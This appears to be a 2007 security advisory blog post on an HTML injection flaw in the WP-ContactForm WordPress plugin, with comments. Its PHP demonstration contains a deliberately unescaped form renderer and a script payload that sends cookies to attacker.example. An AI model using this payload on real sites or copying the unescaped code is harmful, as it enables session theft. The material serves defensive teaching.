Filed Under (Advisories, WordPress) by DK on 19 December 2007

The popular WP-ContactForm plugin has been found vulnerable to HTML Injection.

This could allow an attacker to compromise your blog: if you are logged in to your blog and, in the same browser session, visit a page carrying the embedded attack (or follow a crafted link), the injected HTML runs in your browser with your blog privileges. Phishing-style e-mails that lure the blog owner to such a page or link are another popular way of delivering the attack.

BlogSec is not aware of any fixes as yet. We will update this post when more information is available to us.

Credit to Mustlive for discovering and publishing the vulnerability.

Check BlogSec’s double agent post for HTML Injection mitigation ideas.
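To make the mitigation concrete, here is an added example (not WP-ContactForm's own code, nor code from BlogSec or Mustlive; the advisory gives no plugin source). It assumes a hypothetical contact-form handler that echoes the submitted `name` and `email` fields back into the form, which is the classic way an HTML injection arises, and shows the same handler with its output escaped for the HTML attribute context. The malicious input is constructed for the demonstration.

```php
<?php
// Added example, not the plugin's own code. Hypothetical contact-form
// rendering that reflects submitted fields back into the page.

// Vulnerable: submitted values are inserted into the HTML unescaped. A crafted
// "name" such as  "><script>...</script>  closes the value attribute and the
// input element, so the attacker's markup runs in the visitor's browser.
function render_form_vulnerable(array $fields): string {
    $name  = $fields['name']  ?? '';
    $email = $fields['email'] ?? '';
    return '<form method="post">'
         . '<input name="name" value="' . $name . '">'
         . '<input name="email" value="' . $email . '">'
         . '</form>';
}

// Hardened: every untrusted value is HTML-escaped for the context it lands in.
// In a WordPress plugin use esc_attr() for attribute values and esc_html() for
// text nodes; htmlspecialchars() with ENT_QUOTES is the plain-PHP equivalent
// used here so the file runs without WordPress loaded.
function render_form_safe(array $fields): string {
    $esc = function (string $v): string {
        return htmlspecialchars($v, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    };
    $name  = $esc($fields['name']  ?? '');
    $email = $esc($fields['email'] ?? '');
    return '<form method="post">'
         . '<input name="name" value="' . $name . '">'
         . '<input name="email" value="' . $email . '">'
         . '</form>';
}

// Constructed attack input: the kind of value an attacker would embed in a
// link or phishing e-mail so that a logged-in blog owner submits it to their
// own blog and the injected script runs with their session.
$attack = [
    'name'  => '"><script>document.location="http://attacker.example/?c="+document.cookie</script>',
    'email' => 'x@example.com',
];

echo render_form_vulnerable($attack), "\n"; // attribute broken out of, <script> live
echo render_form_safe($attack), "\n";       // payload rendered as inert text (&quot;&gt;&lt;script&gt;...)
```

Run it with `php example.php` and compare the two lines: in the first the `<script>` element is real markup, in the second it is only text inside the attribute. Escaping on output is the fix for the injection itself; because the advisory's attack path relies on the logged-in owner submitting the attacker's form data, a WordPress plugin should additionally protect its form submission with `wp_nonce_field()` / `check_admin_referer()` so a cross-site page cannot trigger the submission silently.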

Comments

MustLive on 20 December, 2007 at 5:58 pm #

These are vulnerabilities in WP-ContactForm 2.0.7 (and previous 2.x versions). And recently I wrote (http://websecurity.com.ua/1641/) about XSS holes in WP-ContactForm 1.5 alpha (and previous 1.x versions) of the plugin.

So users of both the original 1.x version and the new 2.x version of the plugin are at risk. And they need to fix these holes.


DK on 20 December, 2007 at 7:38 pm #

Mustlive, thanks for the heads up.


Michael on 22 December, 2007 at 6:47 pm #

@mustlive… “And they need to fix these holes.”
Do you have any suggestions as to how I can fix these holes, or do I simply de-activate the plug-in?
More importantly: Is there a safe replacement plug-in?

Happy Christmas, etc.,
Michael

